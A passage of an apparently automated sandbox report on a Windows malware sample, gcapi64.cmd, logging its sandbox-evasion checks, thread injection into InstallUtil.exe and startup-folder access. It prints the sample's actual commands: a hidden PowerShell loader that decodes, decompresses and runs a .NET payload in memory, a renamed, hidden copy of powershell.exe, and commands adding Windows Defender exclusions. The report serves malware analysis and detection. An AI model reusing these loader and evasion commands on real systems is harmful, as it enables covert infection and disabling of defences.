                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 60000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59869Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59746Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59631Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59500Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59389Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59275Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59166Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59047Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58922Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58812Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58703Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58590Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58484Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 180000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59861Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59721Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59596Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59471Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59357Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59236Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59092Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58961Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58827Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58502Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58307Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58190Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58065Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 57940Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 57815Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 57690Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59887Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59781Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59671Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59562Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59445Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59219Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59094Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58984Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58859Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58745Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58625Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58515Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58406Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58296Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58187Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58076Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 57968Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                    Source: InstallUtil.exe, 00000015.00000002.2457809990.000001C9D5FD4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000015.00000002.2535182930.000001C9DE630000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: UGjtg5wiYqeMUAYTFWf
                    Source: gcapi64.cmd.Kwj, 00000014.00000002.2107099890.00000183ABDA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                    Source: gcapi64.cmd.Kwj, 00000005.00000002.2066486416.000002583D604000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}as
                    Source: gcapi64.cmd.Kwj, 00000014.00000002.2107099890.00000183ABDA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                    Source: InstallUtil.exe, 0000000A.00000002.2958800033.0000016BA16AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Creates a thread in another existing process (thread injection)
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjThread created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe EIP: 87020000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjThread created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe EIP: C3F00000
                    Encrypted powershell cmdline option found
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess created: Base64 decoded Add-MpPreference -ExclusionPath C:\Users\jones\Desktop\gcapi64.cmd; Add-MpPreference -ExclusionProcess C:\Users\jones\Desktop\gcapi64.cmd;Add-MpPreference -ExclusionPath C:\Users\jones\AppData\Roaming\gcapi64.cmd; Add-MpPreference -ExclusionProcess C:\Users\jones\AppData\Roaming\gcapi64.cmd
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess created: Base64 decoded Add-MpPreference -ExclusionPath C:\Users\jones\Desktop\gcapi64.cmd; Add-MpPreference -ExclusionProcess C:\Users\jones\Desktop\gcapi64.cmd;Add-MpPreference -ExclusionPath C:\Users\jones\AppData\Roaming\gcapi64.cmd; Add-MpPreference -ExclusionProcess C:\Users\jones\AppData\Roaming\gcapi64.cmdJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe base: 16B87020000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjMemory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe base: 1C9C3F00000
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\Desktop\gcapi64.cmd.KwjJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\Desktop\gcapi64.cmd.KwjJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\gcapi64.cmd.Kwj C:\Users\user\Desktop\gcapi64.cmd.Kwj -WindowStyle hidden -command "$Tcvpdxwib = get-content 'C:\Users\user\Desktop\gcapi64.cmd' | Select-Object -Last 1; $Eyuktr = [System.Convert]::FromBase64String($Tcvpdxwib);$Qtrqzlhpxt = New-Object System.IO.MemoryStream( , $Eyuktr );$Ibywdtdu = New-Object System.IO.MemoryStream;$Reymjtc = New-Object System.IO.Compression.GzipStream $Qtrqzlhpxt, ([IO.Compression.CompressionMode]::Decompress);$Reymjtc.CopyTo( $Ibywdtdu );$Reymjtc.Close();$Qtrqzlhpxt.Close();[byte[]] $Eyuktr = $Ibywdtdu.ToArray();[Array]::Reverse($Eyuktr); $Xxwiev = [System.Threading.Thread]::GetDomain().Load($Eyuktr); $Krabry = $Xxwiev.EntryPoint; [System.Delegate]::CreateDelegate([Action], $Krabry.DeclaringType, $Krabry.Name).DynamicInvoke() | Out-Null"Jump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEQAZQBzAGsAdABvAHAAXABnAGMAYQBwAGkANgA0AC4AYwBtAGQAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABEAGUAcwBrAHQAbwBwAFwAZwBjAGEAcABpADYANAAuAGMAbQBkADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAZwBjAGEAcABpADYANAAuAGMAbQBkADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABnAGMAYQBwAGkANgA0AC4AYwBtAGQAJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\gcapi64.cmd" "Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\AppData\Roaming\gcapi64.cmd.Kwj
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\AppData\Roaming\gcapi64.cmd.Kwj
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\gcapi64.cmd.Kwj C:\Users\user\AppData\Roaming\gcapi64.cmd.Kwj -WindowStyle hidden -command "$Tcvpdxwib = get-content 'C:\Users\user\AppData\Roaming\gcapi64.cmd' | Select-Object -Last 1; $Eyuktr = [System.Convert]::FromBase64String($Tcvpdxwib);$Qtrqzlhpxt = New-Object System.IO.MemoryStream( , $Eyuktr );$Ibywdtdu = New-Object System.IO.MemoryStream;$Reymjtc = New-Object System.IO.Compression.GzipStream $Qtrqzlhpxt, ([IO.Compression.CompressionMode]::Decompress);$Reymjtc.CopyTo( $Ibywdtdu );$Reymjtc.Close();$Qtrqzlhpxt.Close();[byte[]] $Eyuktr = $Ibywdtdu.ToArray();[Array]::Reverse($Eyuktr); $Xxwiev = [System.Threading.Thread]::GetDomain().Load($Eyuktr); $Krabry = $Xxwiev.EntryPoint; [System.Delegate]::CreateDelegate([Action], $Krabry.DeclaringType, $Krabry.Name).DynamicInvoke() | Out-Null"
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\gcapi64.cmd.Kwj c:\users\user\desktop\gcapi64.cmd.kwj -windowstyle hidden -command "$tcvpdxwib = get-content 'c:\users\user\desktop\gcapi64.cmd' | select-object -last 1; $eyuktr = [system.convert]::frombase64string($tcvpdxwib);$qtrqzlhpxt = new-object system.io.memorystream( , $eyuktr );$ibywdtdu = new-object system.io.memorystream;$reymjtc = new-object system.io.compression.gzipstream $qtrqzlhpxt, ([io.compression.compressionmode]::decompress);$reymjtc.copyto( $ibywdtdu );$reymjtc.close();$qtrqzlhpxt.close();[byte[]] $eyuktr = $ibywdtdu.toarray();[array]::reverse($eyuktr); $xxwiev = [system.threading.thread]::getdomain().load($eyuktr); $krabry = $xxwiev.entrypoint; [system.delegate]::createdelegate([action], $krabry.declaringtype, $krabry.name).dynamicinvoke() | out-null"
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc qqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaemaogbcafuacwblahiacwbcagoabwbuaguacwbcaeqazqbzagsadabvahaaxabnagmayqbwagkanga0ac4aywbtagqaowagaeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaataeuaeabjagwadqbzagkabwbuafaacgbvagmazqbzahmaiabdadoaxabvahmazqbyahmaxabqag8abgblahmaxabeaguacwbrahqabwbwafwazwbjageacabpadyanaauagmabqbkadsaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaemaogbcafuacwblahiacwbcagoabwbuaguacwbcaeeacabwaeqayqb0ageaxabsag8ayqbtagkabgbnafwazwbjageacabpadyanaauagmabqbkadsaiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaalqbfahgaywbsahuacwbpag8abgbqahiabwbjaguacwbzacaaqwa6afwavqbzaguacgbzafwaagbvag4azqbzafwaqqbwahaarabhahqayqbcafiabwbhag0aaqbuagcaxabnagmayqbwagkanga0ac4aywbtagqa
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\gcapi64.cmd.Kwj c:\users\user\appdata\roaming\gcapi64.cmd.kwj -windowstyle hidden -command "$tcvpdxwib = get-content 'c:\users\user\appdata\roaming\gcapi64.cmd' | select-object -last 1; $eyuktr = [system.convert]::frombase64string($tcvpdxwib);$qtrqzlhpxt = new-object system.io.memorystream( , $eyuktr );$ibywdtdu = new-object system.io.memorystream;$reymjtc = new-object system.io.compression.gzipstream $qtrqzlhpxt, ([io.compression.compressionmode]::decompress);$reymjtc.copyto( $ibywdtdu );$reymjtc.close();$qtrqzlhpxt.close();[byte[]] $eyuktr = $ibywdtdu.toarray();[array]::reverse($eyuktr); $xxwiev = [system.threading.thread]::getdomain().load($eyuktr); $krabry = $xxwiev.entrypoint; [system.delegate]::createdelegate([action], $krabry.declaringtype, $krabry.name).dynamicinvoke() | out-null"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\gcapi64.cmd.Kwj c:\users\user\desktop\gcapi64.cmd.kwj -windowstyle hidden -command "$tcvpdxwib = get-content 'c:\users\user\desktop\gcapi64.cmd' | select-object -last 1; $eyuktr = [system.convert]::frombase64string($tcvpdxwib);$qtrqzlhpxt = new-object system.io.memorystream( , $eyuktr );$ibywdtdu = new-object system.io.memorystream;$reymjtc = new-object system.io.compression.gzipstream $qtrqzlhpxt, ([io.compression.compressionmode]::decompress);$reymjtc.copyto( $ibywdtdu );$reymjtc.close();$qtrqzlhpxt.close();[byte[]] $eyuktr = $ibywdtdu.toarray();[array]::reverse($eyuktr); $xxwiev = [system.threading.thread]::getdomain().load($eyuktr); $krabry = $xxwiev.entrypoint; [system.delegate]::createdelegate([action], $krabry.declaringtype, $krabry.name).dynamicinvoke() | out-null"Jump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc qqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaemaogbcafuacwblahiacwbcagoabwbuaguacwbcaeqazqbzagsadabvahaaxabnagmayqbwagkanga0ac4aywbtagqaowagaeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaataeuaeabjagwadqbzagkabwbuafaacgbvagmazqbzahmaiabdadoaxabvahmazqbyahmaxabqag8abgblahmaxabeaguacwbrahqabwbwafwazwbjageacabpadyanaauagmabqbkadsaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaemaogbcafuacwblahiacwbcagoabwbuaguacwbcaeeacabwaeqayqb0ageaxabsag8ayqbtagkabgbnafwazwbjageacabpadyanaauagmabqbkadsaiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaalqbfahgaywbsahuacwbpag8abgbqahiabwbjaguacwbzacaaqwa6afwavqbzaguacgbzafwaagbvag4azqbzafwaqqbwahaarabhahqayqbcafiabwbhag0aaqbuagcaxabnagmayqbwagkanga0ac4aywbtagqaJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\gcapi64.cmd.Kwj c:\users\user\appdata\roaming\gcapi64.cmd.kwj -windowstyle hidden -command "$tcvpdxwib = get-content 'c:\users\user\appdata\roaming\gcapi64.cmd' | select-object -last 1; $eyuktr = [system.convert]::frombase64string($tcvpdxwib);$qtrqzlhpxt = new-object system.io.memorystream( , $eyuktr );$ibywdtdu = new-object system.io.memorystream;$reymjtc = new-object system.io.compression.gzipstream $qtrqzlhpxt, ([io.compression.compressionmode]::decompress);$reymjtc.copyto( $ibywdtdu );$reymjtc.close();$qtrqzlhpxt.close();[byte[]] $eyuktr = $ibywdtdu.toarray();[array]::reverse($eyuktr); $xxwiev = [system.threading.thread]::getdomain().load($eyuktr); $krabry = $xxwiev.entrypoint; [system.delegate]::createdelegate([action], $krabry.declaringtype, $krabry.name).dynamicinvoke() | out-null"
                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
